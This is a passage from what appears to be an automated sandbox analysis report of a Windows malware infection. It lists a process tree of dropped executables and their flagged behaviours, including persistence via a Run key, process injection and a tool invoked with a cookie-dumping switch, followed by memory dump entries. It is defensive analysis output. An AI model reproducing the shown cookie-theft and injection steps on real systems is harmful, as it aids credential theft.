                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          PID:5884
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          PID:6056
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4812
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3492
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:572
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5996
                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                        1⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:580
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Checks processor information in registry
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies registry class
                                                                                          PID:1144
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:4960
                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        PID:4024
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5092
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        PID:5420
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:3756
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4740
                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                        1⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        PID:6048
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5528
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1F4C.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\1F4C.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:5632
                                                                                      • C:\Users\Admin\AppData\Local\Temp\270D.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\270D.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5904
                                                                                      • C:\Users\Admin\AppData\Local\Temp\29DD.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\29DD.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6008
                                                                                      • C:\Users\Admin\AppData\Local\Temp\2EB0.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\2EB0.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4484
                                                                                      • C:\Users\Admin\AppData\Local\Temp\3B53.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\3B53.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies data under HKEY_USERS
                                                                                        PID:5308
                                                                                        • C:\Users\Admin\AppData\Local\Temp\339802969.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\339802969.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:1388
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                            3⤵
                                                                                              PID:2844
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1230843919.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1230843919.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:1200
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              3⤵
                                                                                                PID:5252
                                                                                          • C:\Users\Admin\AppData\Local\Temp\4140.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\4140.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4264
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:188
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                                PID:1556
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:1400
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5108
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5808
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:3948
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:4160
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:2812
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:6140
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5868
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                        1⤵
                                                                                                          PID:4292
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:4980
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:1552
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:4912
                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4912 -s 2068
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4548
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:4316
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                              1⤵
                                                                                                                PID:2900

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • memory/68-284-0x0000027FAC940000-0x0000027FAC9B0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/68-152-0x0000027FAC210000-0x0000027FAC280000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/68-148-0x0000027FABA30000-0x0000027FABA7B000-memory.dmp

                                                                                                                Filesize

                                                                                                                300KB

                                                                                                                Download

                                                                                                              • memory/188-199-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/192-280-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.5MB

                                                                                                                Download

                                                                                                              • memory/192-265-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.5MB

                                                                                                                Download

                                                                                                              • memory/196-128-0x0000000000F80000-0x0000000000F81000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/196-157-0x000000001B690000-0x000000001B692000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/196-129-0x0000000000F90000-0x0000000000FAC000-memory.dmp

                                                                                                                Filesize

                                                                                                                112KB

                                                                                                                Download

                                                                                                              • memory/196-126-0x0000000000B30000-0x0000000000B31000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/196-130-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/340-180-0x0000026116740000-0x00000261167B0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/340-269-0x0000026116D40000-0x0000026116DB0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/344-291-0x0000000000400000-0x0000000000447000-memory.dmp

                                                                                                                Filesize

                                                                                                                284KB

                                                                                                                Download

                                                                                                              • memory/580-158-0x000001D622780000-0x000001D6227F0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/636-203-0x0000000000BB0000-0x0000000000BB2000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/1096-279-0x0000029F01440000-0x0000029F014B0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/1096-147-0x0000029F00770000-0x0000029F007E0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/1144-205-0x000001A6D6100000-0x000001A6D61FF000-memory.dmp

                                                                                                                Filesize

                                                                                                                1020KB

                                                                                                                Download

                                                                                                              • memory/1144-176-0x000001A6D3C40000-0x000001A6D3CB0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/1180-170-0x0000026034FB0000-0x0000026035020000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/1376-175-0x000002AD6F400000-0x000002AD6F470000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/1428-288-0x000001F56A2E0000-0x000001F56A350000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/1428-159-0x000001F56A200000-0x000001F56A270000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/1908-165-0x000001430C400000-0x000001430C470000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/2576-189-0x00000154C7CD0000-0x00000154C7D40000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/2576-276-0x00000154C8740000-0x00000154C87B0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/2608-185-0x000002209B490000-0x000002209B500000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/2608-271-0x000002209B360000-0x000002209B3AB000-memory.dmp

                                                                                                                Filesize

                                                                                                                300KB

                                                                                                                Download

                                                                                                              • memory/2608-272-0x000002209BB00000-0x000002209BB70000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/2756-164-0x0000028AEBFA0000-0x0000028AEC010000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/2836-188-0x000001B333A40000-0x000001B333AB0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/2852-181-0x000001D2CBB40000-0x000001D2CBBB0000-memory.dmp

                                                                                                                Filesize

                                                                                                                448KB

                                                                                                                Download

                                                                                                              • memory/3156-208-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                Filesize

                                                                                                                88KB

                                                                                                                Download

                                                                                                              • memory/3384-146-0x000000000486E000-0x000000000496F000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                                Download

                                                                                                              • memory/3384-150-0x0000000004AB0000-0x0000000004B0C000-memory.dmp

                                                                                                                Filesize

                                                                                                                368KB

                                                                                                                Download

                                                                                                              • memory/3584-273-0x0000000000D50000-0x0000000000DAC000-memory.dmp

                                                                                                                Filesize

                                                                                                                368KB

                                                                                                                Download

                                                                                                              • memory/3584-268-0x00000000006C0000-0x00000000007C1000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                                Download

                                                                                                              • memory/3804-222-0x0000000002870000-0x0000000002872000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/3956-213-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/3996-193-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                                Download

                                                                                                              • memory/4108-223-0x00000000027B0000-0x00000000027B2000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/4108-237-0x00000000027B4000-0x00000000027B5000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/4108-238-0x00000000027B5000-0x00000000027B7000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/4108-235-0x00000000027B2000-0x00000000027B4000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/4144-289-0x0000000002490000-0x00000000024D4000-memory.dmp

                                                                                                                Filesize

                                                                                                                272KB

                                                                                                                Download

                                                                                                              • memory/4152-239-0x0000000000B75000-0x0000000000B76000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/4152-228-0x0000000000B70000-0x0000000000B72000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/4152-236-0x0000000000B72000-0x0000000000B74000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                Download

                                                                                                              • memory/4236-249-0x00000000004D0000-0x000000000061A000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.3MB

                                                                                                                Download

                                                                                                              • memory/4236-248-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                Download

                                                                                                              • memory/4260-232-0x00000000013A0000-0x00000000013AD000-memory.dmp

                                                                                                                Filesize

                                                                                                                52KB

                                                                                                                Download

                                                                                                              • memory/4260-258-0x0000000000400000-0x0000000000448000-memory.dmp

                                                                                                                Filesize

                                                                                                                288KB

                                                                                                                Download

                                                                                                              • memory/4268-293-0x0000000140000000-0x000000014070A000-memory.dmp

                                                                                                                Filesize

                                                                                                                7.0MB

                                                                                                                Download

                                                                                                              • memory/4268-300-0x000001ECD2430000-0x000001ECD2444000-memory.dmp

                                                                                                                Filesize

                                                                                                                80KB

                                                                                                                Download

                                                                                                              • memory/6024-348-0x00000000072F0000-0x00000000072F1000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download

                                                                                                              • memory/6024-349-0x0000000007A30000-0x0000000007A31000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                Download